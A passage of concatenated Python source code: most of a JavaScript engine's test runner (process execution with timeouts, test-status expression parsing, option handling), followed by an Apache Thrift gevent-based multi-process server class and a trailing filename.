self.ClearLine(self.last_status_length) self.PrintFailureHeader(output.test) stdout = output.output.stdout.strip() if len(stdout): print self.templates['stdout'] % stdout stderr = output.output.stderr.strip() if len(stderr): print self.templates['stderr'] % stderr print "Command: %s" % EscapeCommand(output.command) if output.HasCrashed(): print "--- CRASHED ---" if output.HasTimedOut(): print "--- TIMEOUT ---" def Truncate(self, str, length): if length and (len(str) > (length - 3)): return str[:(length-3)] + "..." else: return str def PrintProgress(self, name): self.ClearLine(self.last_status_length) elapsed = time.time() - self.start_time status = self.templates['status_line'] % { 'passed': self.succeeded, 'remaining': (((self.total - self.remaining) * 100) // self.total), 'failed': len(self.failed), 'test': name, 'mins': int(elapsed) / 60, 'secs': int(elapsed) % 60 } status = self.Truncate(status, 78) self.last_status_length = len(status) print status, sys.stdout.flush() class ColorProgressIndicator(CompactProgressIndicator): def __init__(self, cases): templates = { 'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s", 'stdout': "\033[1m%s\033[0m", 'stderr': "\033[31m%s\033[0m", } super(ColorProgressIndicator, self).__init__(cases, templates) def ClearLine(self, last_line_length): print "\033[1K\r", class MonochromeProgressIndicator(CompactProgressIndicator): def __init__(self, cases): templates = { 'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s", 'stdout': '%s', 'stderr': '%s', } super(MonochromeProgressIndicator, self).__init__(cases, templates) def ClearLine(self, last_line_length): print ("\r" + (" " * last_line_length) + "\r"), PROGRESS_INDICATORS = { 'verbose': VerboseProgressIndicator, 'dots': DotsProgressIndicator, 'color': ColorProgressIndicator, 'mono': MonochromeProgressIndicator } # ------------------------- # --- F r a m e w o r k --- # ------------------------- class BreakNowException(Exception): def __init__(self, value): self.value = value def __str__(self): return repr(self.value) class CommandOutput(object): def __init__(self, exit_code, timed_out, stdout, stderr): self.exit_code = exit_code self.timed_out = timed_out self.stdout = stdout self.stderr = stderr self.failed = None class TestCase(object): def __init__(self, context, path, mode): self.path = path self.context = context self.duration = None self.mode = mode def IsNegative(self): return False def TestsIsolates(self): return False def CompareTime(self, other): return cmp(other.duration, self.duration) def DidFail(self, output): if output.failed is None: output.failed = self.IsFailureOutput(output) return output.failed def IsFailureOutput(self, output): return output.exit_code != 0 def GetSource(self): return "(no source available)" def RunCommand(self, command): full_command = self.context.processor(command) output = Execute(full_command, self.context, self.context.GetTimeout(self, self.mode)) self.Cleanup() return TestOutput(self, full_command, output, self.context.store_unexpected_output) def BeforeRun(self): pass def AfterRun(self, result): pass def GetCustomFlags(self, mode): return None def Run(self): self.BeforeRun() result = None try: result = self.RunCommand(self.GetCommand()) except: self.terminate = True raise BreakNowException("User pressed CTRL+C or IO went wrong") finally: self.AfterRun(result) return result def Cleanup(self): return class TestOutput(object): def __init__(self, test, command, output, store_unexpected_output): self.test = test self.command = command self.output = output self.store_unexpected_output = store_unexpected_output def UnexpectedOutput(self): if self.HasCrashed(): outcome = CRASH elif self.HasTimedOut(): outcome = TIMEOUT elif self.HasFailed(): outcome = FAIL else: outcome = PASS return not outcome in self.test.outcomes def HasPreciousOutput(self): return self.UnexpectedOutput() and self.store_unexpected_output def HasCrashed(self): if utils.IsWindows(): return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code) else: # Timed out tests will have exit_code -signal.SIGTERM. if self.output.timed_out: return False return self.output.exit_code < 0 and \ self.output.exit_code != -signal.SIGABRT def HasTimedOut(self): return self.output.timed_out def HasFailed(self): execution_failed = self.test.DidFail(self.output) if self.test.IsNegative(): return not execution_failed else: return execution_failed def KillProcessWithID(pid): if utils.IsWindows(): os.popen('taskkill /T /F /PID %d' % pid) else: os.kill(pid, signal.SIGTERM) MAX_SLEEP_TIME = 0.1 INITIAL_SLEEP_TIME = 0.0001 SLEEP_TIME_FACTOR = 1.25 SEM_INVALID_VALUE = -1 SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h def Win32SetErrorMode(mode): prev_error_mode = SEM_INVALID_VALUE try: import ctypes prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode) except ImportError: pass return prev_error_mode def RunProcess(context, timeout, args, **rest): if context.verbose: print "#", " ".join(args) popen_args = args prev_error_mode = SEM_INVALID_VALUE if utils.IsWindows(): popen_args = subprocess.list2cmdline(args) if context.suppress_dialogs: # Try to change the error mode to avoid dialogs on fatal errors. Don't # touch any existing error mode flags by merging the existing error mode. # See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx. error_mode = SEM_NOGPFAULTERRORBOX prev_error_mode = Win32SetErrorMode(error_mode) Win32SetErrorMode(error_mode | prev_error_mode) process = subprocess.Popen( shell = utils.IsWindows(), args = popen_args, **rest ) if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE: Win32SetErrorMode(prev_error_mode) # Compute the end time - if the process crosses this limit we # consider it timed out. if timeout is None: end_time = None else: end_time = time.time() + timeout timed_out = False # Repeatedly check the exit code from the process in a # loop and keep track of whether or not it times out. exit_code = None sleep_time = INITIAL_SLEEP_TIME while exit_code is None: if (not end_time is None) and (time.time() >= end_time): # Kill the process and wait for it to exit. KillProcessWithID(process.pid) exit_code = process.wait() timed_out = True else: exit_code = process.poll() time.sleep(sleep_time) sleep_time = sleep_time * SLEEP_TIME_FACTOR if sleep_time > MAX_SLEEP_TIME: sleep_time = MAX_SLEEP_TIME return (process, exit_code, timed_out) def PrintError(str): sys.stderr.write(str) sys.stderr.write('\n') def CheckedUnlink(name): # On Windows, when run with -jN in parallel processes, # OS often fails to unlink the temp file. Not sure why. # Need to retry. # Idea from https://bugs.webkit.org/attachment.cgi?id=75982&action=prettypatch retry_count = 0 while retry_count < 30: try: os.unlink(name) return except OSError, e: retry_count += 1 time.sleep(retry_count * 0.1) PrintError("os.unlink() " + str(e)) def Execute(args, context, timeout=None): (fd_out, outname) = tempfile.mkstemp() (fd_err, errname) = tempfile.mkstemp() (process, exit_code, timed_out) = RunProcess( context, timeout, args = args, stdout = fd_out, stderr = fd_err, ) os.close(fd_out) os.close(fd_err) output = file(outname).read() errors = file(errname).read() CheckedUnlink(outname) CheckedUnlink(errname) return CommandOutput(exit_code, timed_out, output, errors) def ExecuteNoCapture(args, context, timeout=None): (process, exit_code, timed_out) = RunProcess( context, timeout, args = args, ) return CommandOutput(exit_code, False, "", "") def CarCdr(path): if len(path) == 0: return (None, [ ]) else: return (path[0], path[1:]) # Use this to run several variants of the tests, e.g.: # VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']] VARIANT_FLAGS = [[], ['--stress-opt', '--always-opt'], ['--nocrankshaft']] class TestConfiguration(object): def __init__(self, context, root): self.context = context self.root = root def Contains(self, path, file): if len(path) > len(file): return False for i in xrange(len(path)): if not path[i].match(file[i]): return False return True def GetTestStatus(self, sections, defs): pass def VariantFlags(self): return VARIANT_FLAGS class TestSuite(object): def __init__(self, name): self.name = name def GetName(self): return self.name class TestRepository(TestSuite): def __init__(self, path): normalized_path = abspath(path) super(TestRepository, self).__init__(basename(normalized_path)) self.path = normalized_path self.is_loaded = False self.config = None def GetConfiguration(self, context): if self.is_loaded: return self.config self.is_loaded = True file = None try: (file, pathname, description) = imp.find_module('testcfg', [ self.path ]) module = imp.load_module('testcfg', file, pathname, description) self.config = module.GetConfiguration(context, self.path) finally: if file: file.close() return self.config def GetBuildRequirements(self, path, context): return self.GetConfiguration(context).GetBuildRequirements() def DownloadData(self, context): config = self.GetConfiguration(context) if 'DownloadData' in dir(config): config.DownloadData() def AddTestsToList(self, result, current_path, path, context, mode): config = self.GetConfiguration(context) for v in config.VariantFlags(): tests = config.ListTests(current_path, path, mode, v) for t in tests: t.variant_flags = v result += tests def GetTestStatus(self, context, sections, defs): self.GetConfiguration(context).GetTestStatus(sections, defs) class LiteralTestSuite(TestSuite): def __init__(self, tests): super(LiteralTestSuite, self).__init__('root') self.tests = tests def GetBuildRequirements(self, path, context): (name, rest) = CarCdr(path) result = [ ] for test in self.tests: if not name or name.match(test.GetName()): result += test.GetBuildRequirements(rest, context) return result def DownloadData(self, path, context): (name, rest) = CarCdr(path) for test in self.tests: if not name or name.match(test.GetName()): test.DownloadData(context) def ListTests(self, current_path, path, context, mode, variant_flags): (name, rest) = CarCdr(path) result = [ ] for test in self.tests: test_name = test.GetName() if not name or name.match(test_name): full_path = current_path + [test_name] test.AddTestsToList(result, full_path, path, context, mode) return result def GetTestStatus(self, context, sections, defs): for test in self.tests: test.GetTestStatus(context, sections, defs) SUFFIX = { 'debug' : '_g', 'release' : '' } FLAGS = { 'debug' : ['--nobreak-on-abort', '--nodead-code-elimination', '--nofold-constants', '--enable-slow-asserts', '--debug-code', '--verify-heap'], 'release' : ['--nobreak-on-abort', '--nodead-code-elimination', '--nofold-constants']} TIMEOUT_SCALEFACTOR = { 'debug' : 4, 'release' : 1 } class Context(object): def __init__(self, workspace, buildspace, verbose, vm, timeout, processor, suppress_dialogs, store_unexpected_output): self.workspace = workspace self.buildspace = buildspace self.verbose = verbose self.vm_root = vm self.timeout = timeout self.processor = processor self.suppress_dialogs = suppress_dialogs self.store_unexpected_output = store_unexpected_output def GetVm(self, mode): name = self.vm_root + SUFFIX[mode] if utils.IsWindows() and not name.endswith('.exe'): name = name + '.exe' return name def GetVmCommand(self, testcase, mode): return [self.GetVm(mode)] + self.GetVmFlags(testcase, mode) def GetVmFlags(self, testcase, mode): flags = testcase.GetCustomFlags(mode) if flags is None: flags = FLAGS[mode] return testcase.variant_flags + flags def GetTimeout(self, testcase, mode): result = self.timeout * TIMEOUT_SCALEFACTOR[mode] if '--stress-opt' in self.GetVmFlags(testcase, mode): return result * 4 else: return result def RunTestCases(cases_to_run, progress, tasks): progress = PROGRESS_INDICATORS[progress](cases_to_run) result = 0 try: result = progress.Run(tasks) except Exception, e: print "\n", e return result def BuildRequirements(context, requirements, mode, scons_flags): command_line = (['scons', '-Y', context.workspace, 'mode=' + ",".join(mode)] + requirements + scons_flags) output = ExecuteNoCapture(command_line, context) return output.exit_code == 0 # ------------------------------------------- # --- T e s t C o n f i g u r a t i o n --- # ------------------------------------------- SKIP = 'skip' FAIL = 'fail' PASS = 'pass' OKAY = 'okay' TIMEOUT = 'timeout' CRASH = 'crash' SLOW = 'slow' class Expression(object): pass class Constant(Expression): def __init__(self, value): self.value = value def Evaluate(self, env, defs): return self.value class Variable(Expression): def __init__(self, name): self.name = name def GetOutcomes(self, env, defs): if self.name in env: return ListSet([env[self.name]]) else: return Nothing() def Evaluate(self, env, defs): return env[self.name] class Outcome(Expression): def __init__(self, name): self.name = name def GetOutcomes(self, env, defs): if self.name in defs: return defs[self.name].GetOutcomes(env, defs) else: return ListSet([self.name]) class Set(object): pass class ListSet(Set): def __init__(self, elms): self.elms = elms def __str__(self): return "ListSet%s" % str(self.elms) def Intersect(self, that): if not isinstance(that, ListSet): return that.Intersect(self) return ListSet([ x for x in self.elms if x in that.elms ]) def Union(self, that): if not isinstance(that, ListSet): return that.Union(self) return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ]) def IsEmpty(self): return len(self.elms) == 0 class Everything(Set): def Intersect(self, that): return that def Union(self, that): return self def IsEmpty(self): return False class Nothing(Set): def Intersect(self, that): return self def Union(self, that): return that def IsEmpty(self): return True class Operation(Expression): def __init__(self, left, op, right): self.left = left self.op = op self.right = right def Evaluate(self, env, defs): if self.op == '||' or self.op == ',': return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs) elif self.op == 'if': return False elif self.op == '==': inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs)) return not inter.IsEmpty() elif self.op == '!=': inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs)) return inter.IsEmpty() else: assert self.op == '&&' return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs) def GetOutcomes(self, env, defs): if self.op == '||' or self.op == ',': return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs)) elif self.op == 'if': if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs) else: return Nothing() else: assert self.op == '&&' return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs)) def IsAlpha(str): for char in str: if not (char.isalpha() or char.isdigit() or char == '_'): return False return True class Tokenizer(object): """A simple string tokenizer that chops expressions into variables, parens and operators""" def __init__(self, expr): self.index = 0 self.expr = expr self.length = len(expr) self.tokens = None def Current(self, length = 1): if not self.HasMore(length): return "" return self.expr[self.index:self.index+length] def HasMore(self, length = 1): return self.index < self.length + (length - 1) def Advance(self, count = 1): self.index = self.index + count def AddToken(self, token): self.tokens.append(token) def SkipSpaces(self): while self.HasMore() and self.Current().isspace(): self.Advance() def Tokenize(self): self.tokens = [ ] while self.HasMore(): self.SkipSpaces() if not self.HasMore(): return None if self.Current() == '(': self.AddToken('(') self.Advance() elif self.Current() == ')': self.AddToken(')') self.Advance() elif self.Current() == '$': self.AddToken('$') self.Advance() elif self.Current() == ',': self.AddToken(',') self.Advance() elif IsAlpha(self.Current()): buf = "" while self.HasMore() and IsAlpha(self.Current()): buf += self.Current() self.Advance() self.AddToken(buf) elif self.Current(2) == '&&': self.AddToken('&&') self.Advance(2) elif self.Current(2) == '||': self.AddToken('||') self.Advance(2) elif self.Current(2) == '==': self.AddToken('==') self.Advance(2) elif self.Current(2) == '!=': self.AddToken('!=') self.Advance(2) else: return None return self.tokens class Scanner(object): """A simple scanner that can serve out tokens from a given list""" def __init__(self, tokens): self.tokens = tokens self.length = len(tokens) self.index = 0 def HasMore(self): return self.index < self.length def Current(self): return self.tokens[self.index] def Advance(self): self.index = self.index + 1 def ParseAtomicExpression(scan): if scan.Current() == "true": scan.Advance() return Constant(True) elif scan.Current() == "false": scan.Advance() return Constant(False) elif IsAlpha(scan.Current()): name = scan.Current() scan.Advance() return Outcome(name.lower()) elif scan.Current() == '$': scan.Advance() if not IsAlpha(scan.Current()): return None name = scan.Current() scan.Advance() return Variable(name.lower()) elif scan.Current() == '(': scan.Advance() result = ParseLogicalExpression(scan) if (not result) or (scan.Current() != ')'): return None scan.Advance() return result else: return None BINARIES = ['==', '!='] def ParseOperatorExpression(scan): left = ParseAtomicExpression(scan) if not left: return None while scan.HasMore() and (scan.Current() in BINARIES): op = scan.Current() scan.Advance() right = ParseOperatorExpression(scan) if not right: return None left = Operation(left, op, right) return left def ParseConditionalExpression(scan): left = ParseOperatorExpression(scan) if not left: return None while scan.HasMore() and (scan.Current() == 'if'): scan.Advance() right = ParseOperatorExpression(scan) if not right: return None left = Operation(left, 'if', right) return left LOGICALS = ["&&", "||", ","] def ParseLogicalExpression(scan): left = ParseConditionalExpression(scan) if not left: return None while scan.HasMore() and (scan.Current() in LOGICALS): op = scan.Current() scan.Advance() right = ParseConditionalExpression(scan) if not right: return None left = Operation(left, op, right) return left def ParseCondition(expr): """Parses a logical expression into an Expression object""" tokens = Tokenizer(expr).Tokenize() if not tokens: print "Malformed expression: '%s'" % expr return None scan = Scanner(tokens) ast = ParseLogicalExpression(scan) if not ast: print "Malformed expression: '%s'" % expr return None if scan.HasMore(): print "Malformed expression: '%s'" % expr return None return ast class ClassifiedTest(object): def __init__(self, case, outcomes): self.case = case self.outcomes = outcomes def TestsIsolates(self): return self.case.TestsIsolates() class Configuration(object): """The parsed contents of a configuration file""" def __init__(self, sections, defs): self.sections = sections self.defs = defs def ClassifyTests(self, cases, env): sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)] all_rules = reduce(list.__add__, [s.rules for s in sections], []) unused_rules = set(all_rules) result = [ ] all_outcomes = set([]) for case in cases: matches = [ r for r in all_rules if r.Contains(case.path) ] outcomes = set([]) for rule in matches: outcomes = outcomes.union(rule.GetOutcomes(env, self.defs)) unused_rules.discard(rule) if not outcomes: outcomes = [PASS] case.outcomes = outcomes all_outcomes = all_outcomes.union(outcomes) result.append(ClassifiedTest(case, outcomes)) return (result, list(unused_rules), all_outcomes) class Section(object): """A section of the configuration file. Sections are enabled or disabled prior to running the tests, based on their conditions""" def __init__(self, condition): self.condition = condition self.rules = [ ] def AddRule(self, rule): self.rules.append(rule) class Rule(object): """A single rule that specifies the expected outcome for a single test.""" def __init__(self, raw_path, path, value): self.raw_path = raw_path self.path = path self.value = value def GetOutcomes(self, env, defs): set = self.value.GetOutcomes(env, defs) assert isinstance(set, ListSet) return set.elms def Contains(self, path): if len(self.path) > len(path): return False for i in xrange(len(self.path)): if not self.path[i].match(path[i]): return False return True HEADER_PATTERN = re.compile(r'\[([^]]+)\]') RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)') DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$') PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$') def ReadConfigurationInto(path, sections, defs): current_section = Section(Constant(True)) sections.append(current_section) prefix = [] for line in utils.ReadLinesFrom(path): header_match = HEADER_PATTERN.match(line) if header_match: condition_str = header_match.group(1).strip() condition = ParseCondition(condition_str) new_section = Section(condition) sections.append(new_section) current_section = new_section continue rule_match = RULE_PATTERN.match(line) if rule_match: path = prefix + SplitPath(rule_match.group(1).strip()) value_str = rule_match.group(2).strip() value = ParseCondition(value_str) if not value: return False current_section.AddRule(Rule(rule_match.group(1), path, value)) continue def_match = DEF_PATTERN.match(line) if def_match: name = def_match.group(1).lower() value = ParseCondition(def_match.group(2).strip()) if not value: return False defs[name] = value continue prefix_match = PREFIX_PATTERN.match(line) if prefix_match: prefix = SplitPath(prefix_match.group(1).strip()) continue print "Malformed line: '%s'." % line return False return True # --------------- # --- M a i n --- # --------------- ARCH_GUESS = utils.GuessArchitecture() TIMEOUT_DEFAULT = 60; def BuildOptions(): result = optparse.OptionParser() result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)", default='release') result.add_option("-v", "--verbose", help="Verbose output", default=False, action="store_true") result.add_option("-S", dest="scons_flags", help="Flag to pass through to scons", default=[], action="append") result.add_option("-p", "--progress", help="The style of progress indicator (verbose, dots, color, mono)", choices=PROGRESS_INDICATORS.keys(), default="mono") result.add_option("--no-build", help="Don't build requirements", default=False, action="store_true") result.add_option("--build-only", help="Only build requirements, don't run the tests", default=False, action="store_true") result.add_option("--build-system", help="Build system in use (scons or gyp)", default='scons') result.add_option("--report", help="Print a summary of the tests to be run", default=False, action="store_true") result.add_option("--download-data", help="Download missing test suite data", default=False, action="store_true") result.add_option("-s", "--suite", help="A test suite", default=[], action="append") result.add_option("-t", "--timeout", help="Timeout in seconds", default=-1, type="int") result.add_option("--arch", help='The architecture to run tests for', default='none') result.add_option("--snapshot", help="Run the tests with snapshot turned on", default=False, action="store_true") result.add_option("--simulator", help="Run tests with architecture simulator", default='none') result.add_option("--special-command", default=None) result.add_option("--valgrind", help="Run tests through valgrind", default=False, action="store_true") result.add_option("--cat", help="Print the source of the tests", default=False, action="store_true") result.add_option("--warn-unused", help="Report unused rules", default=False, action="store_true") result.add_option("-j", help="The number of parallel tasks to run", default=1, type="int") result.add_option("--time", help="Print timing information after running", default=False, action="store_true") result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests", dest="suppress_dialogs", default=True, action="store_true") result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests", dest="suppress_dialogs", action="store_false") result.add_option("--mips-arch-variant", help="mips architecture variant: mips32r1/mips32r2", default="mips32r2"); result.add_option("--shell", help="Path to V8 shell", default="d8") result.add_option("--isolates", help="Whether to test isolates", default=False, action="store_true") result.add_option("--store-unexpected-output", help="Store the temporary JS files from tests that fails", dest="store_unexpected_output", default=True, action="store_true") result.add_option("--no-store-unexpected-output", help="Deletes the temporary JS files from tests that fails", dest="store_unexpected_output", action="store_false") result.add_option("--stress-only", help="Only run tests with --always-opt --stress-opt", default=False, action="store_true") result.add_option("--nostress", help="Don't run crankshaft --always-opt --stress-op test", default=False, action="store_true") result.add_option("--shard-count", help="Split testsuites into this number of shards", default=1, type="int") result.add_option("--shard-run", help="Run this shard from the split up tests.", default=1, type="int") result.add_option("--noprof", help="Disable profiling support", default=False) return result def ProcessOptions(options): global VERBOSE VERBOSE = options.verbose options.mode = options.mode.split(',') for mode in options.mode: if not mode in ['debug', 'release']: print "Unknown mode %s" % mode return False if options.simulator != 'none': # Simulator argument was set. Make sure arch and simulator agree. if options.simulator != options.arch: if options.arch == 'none': options.arch = options.simulator else: print "Architecture %s does not match sim %s" %(options.arch, options.simulator) return False # Ensure that the simulator argument is handed down to scons. options.scons_flags.append("simulator=" + options.simulator) else: # If options.arch is not set by the command line and no simulator setting # was found, set the arch to the guess. if options.arch == 'none': options.arch = ARCH_GUESS options.scons_flags.append("arch=" + options.arch) # Simulators are slow, therefore allow a longer default timeout. if options.timeout == -1: if options.arch in ['android', 'arm', 'mipsel']: options.timeout = 2 * TIMEOUT_DEFAULT; else: options.timeout = TIMEOUT_DEFAULT; if options.snapshot: options.scons_flags.append("snapshot=on") global VARIANT_FLAGS if options.mips_arch_variant: options.scons_flags.append("mips_arch_variant=" + options.mips_arch_variant) if options.stress_only: VARIANT_FLAGS = [['--stress-opt', '--always-opt']] if options.nostress: VARIANT_FLAGS = [[],['--nocrankshaft']] if options.shell.endswith("d8"): if options.special_command: options.special_command += " --test" else: options.special_command = "@ --test" if options.noprof: options.scons_flags.append("prof=off") options.scons_flags.append("profilingsupport=off") if options.build_system == 'gyp': if options.build_only: print "--build-only not supported for gyp, please build manually." options.build_only = False return True def DoSkip(case): return (SKIP in case.outcomes) or (SLOW in case.outcomes) REPORT_TEMPLATE = """\ Total: %(total)i tests * %(skipped)4d tests will be skipped * %(timeout)4d tests are expected to timeout sometimes * %(nocrash)4d tests are expected to be flaky but not crash * %(pass)4d tests are expected to pass * %(fail_ok)4d tests are expected to fail that we won't fix * %(fail)4d tests are expected to fail that we should fix\ """ def PrintReport(cases): def IsFlaky(o): return (PASS in o) and (FAIL in o) and (not CRASH in o) and (not OKAY in o) def IsFailOk(o): return (len(o) == 2) and (FAIL in o) and (OKAY in o) unskipped = [c for c in cases if not DoSkip(c)] print REPORT_TEMPLATE % { 'total': len(cases), 'skipped': len(cases) - len(unskipped), 'timeout': len([t for t in unskipped if TIMEOUT in t.outcomes]), 'nocrash': len([t for t in unskipped if IsFlaky(t.outcomes)]), 'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]), 'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]), 'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]]) } class Pattern(object): def __init__(self, pattern): self.pattern = pattern self.compiled = None def match(self, str): if not self.compiled: pattern = "^" + self.pattern.replace('*', '.*') + "$" self.compiled = re.compile(pattern) return self.compiled.match(str) def __str__(self): return self.pattern def SplitPath(s): stripped = [ c.strip() for c in s.split('/') ] return [ Pattern(s) for s in stripped if len(s) > 0 ] def GetSpecialCommandProcessor(value): if (not value) or (value.find('@') == -1): def ExpandCommand(args): return args return ExpandCommand else: pos = value.find('@') import urllib import shlex prefix = shlex.split(urllib.unquote(value[:pos])) suffix = shlex.split(urllib.unquote(value[pos+1:])) def ExpandCommand(args): return prefix + args + suffix return ExpandCommand BUILT_IN_TESTS = ['mjsunit', 'cctest', 'message', 'preparser'] def GetSuites(test_root): def IsSuite(path): return isdir(path) and exists(join(path, 'testcfg.py')) return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ] def FormatTime(d): millis = round(d * 1000) % 1000 return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis) def ShardTests(tests, options): if options.shard_count < 2: return tests if options.shard_run < 1 or options.shard_run > options.shard_count: print "shard-run not a valid number, should be in [1:shard-count]" print "defaulting back to running all tests" return tests count = 0 shard = [] for test in tests: if count % options.shard_count == options.shard_run - 1: shard.append(test) count += 1 return shard def Main(): parser = BuildOptions() (options, args) = parser.parse_args() if not ProcessOptions(options): parser.print_help() return 1 workspace = abspath(join(dirname(sys.argv[0]), '..')) suites = GetSuites(join(workspace, 'test')) repositories = [TestRepository(join(workspace, 'test', name)) for name in suites] repositories += [TestRepository(a) for a in options.suite] root = LiteralTestSuite(repositories) if len(args) == 0: paths = [SplitPath(t) for t in BUILT_IN_TESTS] else: paths = [ ] for arg in args: path = SplitPath(arg) paths.append(path) # Check for --valgrind option. If enabled, we overwrite the special # command flag with a command that uses the run-valgrind.py script. if options.valgrind: run_valgrind = join(workspace, "tools", "run-valgrind.py") options.special_command = "python -u " + run_valgrind + " @" if options.build_system == 'gyp': SUFFIX['debug'] = '' shell = abspath(options.shell) buildspace = dirname(shell) context = Context(workspace, buildspace, VERBOSE, shell, options.timeout, GetSpecialCommandProcessor(options.special_command), options.suppress_dialogs, options.store_unexpected_output) # First build the required targets if not options.no_build: reqs = [ ] for path in paths: reqs += root.GetBuildRequirements(path, context) reqs = list(set(reqs)) if len(reqs) > 0: if options.j != 1: options.scons_flags += ['-j', str(options.j)] if not BuildRequirements(context, reqs, options.mode, options.scons_flags): return 1 # Just return if we are only building the targets for running the tests. if options.build_only: return 0 # Get status for tests sections = [ ] defs = { } root.GetTestStatus(context, sections, defs) config = Configuration(sections, defs) # Download missing test suite data if requested. if options.download_data: for path in paths: root.DownloadData(path, context) # List the tests all_cases = [ ] all_unused = [ ] unclassified_tests = [ ] globally_unused_rules = None for path in paths: for mode in options.mode: env = { 'mode': mode, 'system': utils.GuessOS(), 'arch': options.arch, 'simulator': options.simulator, 'isolates': options.isolates } test_list = root.ListTests([], path, context, mode, []) unclassified_tests += test_list (cases, unused_rules, all_outcomes) = config.ClassifyTests(test_list, env) if globally_unused_rules is None: globally_unused_rules = set(unused_rules) else: globally_unused_rules = globally_unused_rules.intersection(unused_rules) all_cases += ShardTests(cases, options) all_unused.append(unused_rules) if options.cat: visited = set() for test in unclassified_tests: key = tuple(test.path) if key in visited: continue visited.add(key) print "--- begin source: %s ---" % test.GetLabel() source = test.GetSource().strip() print source print "--- end source: %s ---" % test.GetLabel() return 0 if options.warn_unused: for rule in globally_unused_rules: print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path]) if not options.isolates: all_cases = [c for c in all_cases if not c.TestsIsolates()] if options.report: PrintReport(all_cases) result = None cases_to_run = [ c for c in all_cases if not DoSkip(c) ] if len(cases_to_run) == 0: print "No tests to run." return 0 else: try: start = time.time() if RunTestCases(cases_to_run, options.progress, options.j): result = 0 else: result = 1 duration = time.time() - start except KeyboardInterrupt: print "Interrupted" return 1 if options.time: # Write the times to stderr to make it easy to separate from the # test output. print sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration)) timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ] timed_tests.sort(lambda a, b: a.CompareTime(b)) index = 1 for entry in timed_tests[:20]: t = FormatTime(entry.duration) sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel())) index += 1 return result if __name__ == '__main__': sys.exit(Main())
TGeventServer.py
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import collections import logging import multiprocessing from multiprocessing import Process import gevent from gevent.server import StreamServer from .TServer import TServer from nebula2.fbthrift.transport.TTransport import TTransportException from nebula2.fbthrift.transport.TSocket import TSocket from nebula2.fbthrift.protocol.THeaderProtocol import THeaderProtocolFactory from gevent import monkey monkey.patch_all(select=False) class TGeventServer(TServer): """ Server with a fixed size pool of worker subprocesses which service requests. Note that if you need shared state between the handlers - it's up to you! Written by Dvir Volk, doat.com """ def __init__(self, port, *args): TServer.__init__(self, *args) self.port = port self.numWorkers = multiprocessing.cpu_count() self.workers = [] self.postForkCallback = None def setPostForkCallback(self, callback): if not isinstance(callback, collections.Callable): raise TypeError("This is not a callback!") self.postForkCallback = callback def setNumWorkers(self, num): """Set the number of worker threads that should be created""" self.numWorkers = num def serveClient(self, socket, address): """Process input/output from a client for as long as possible""" client = TSocket() client.setHandle(socket) itrans = self.inputTransportFactory.getTransport(client) otrans = self.outputTransportFactory.getTransport(client) iprot = self.inputProtocolFactory.getProtocol(itrans) if isinstance(self.inputProtocolFactory, THeaderProtocolFactory): oprot = iprot else: oprot = self.outputProtocolFactory.getProtocol(otrans) try: while True: self.processor.process(iprot, oprot) except TTransportException: pass except Exception as x: logging.exception(x) itrans.close() otrans.close() def serve_forever(self): if self.postForkCallback: self.postForkCallback() while True: try: self.server.serve_forever() except (KeyboardInterrupt, SystemExit): return 0 except Exception as x: logging.exception(x) def serve(self, listener=None): """Start a fixed number of worker threads and put client into a queue""" if not listener: listener = ('', self.port) self.server = StreamServer(listener, self.serveClient) # Temporary patch for gevent 0.13.x # Remove pre_start when we are fully on gevent 1.0 if gevent.version_info[0] == 0: self.server.pre_start() else: self.server.init_socket() print('Starting %s workers' % self.numWorkers) for _ in range(self.numWorkers - 1): # Current process also serves p = Process(target=self.serve_forever) self.workers.append(p) p.start() self.serve_forever() def stop(self): for worker in self.workers: worker.terminate() self.server.stop()
epub.py
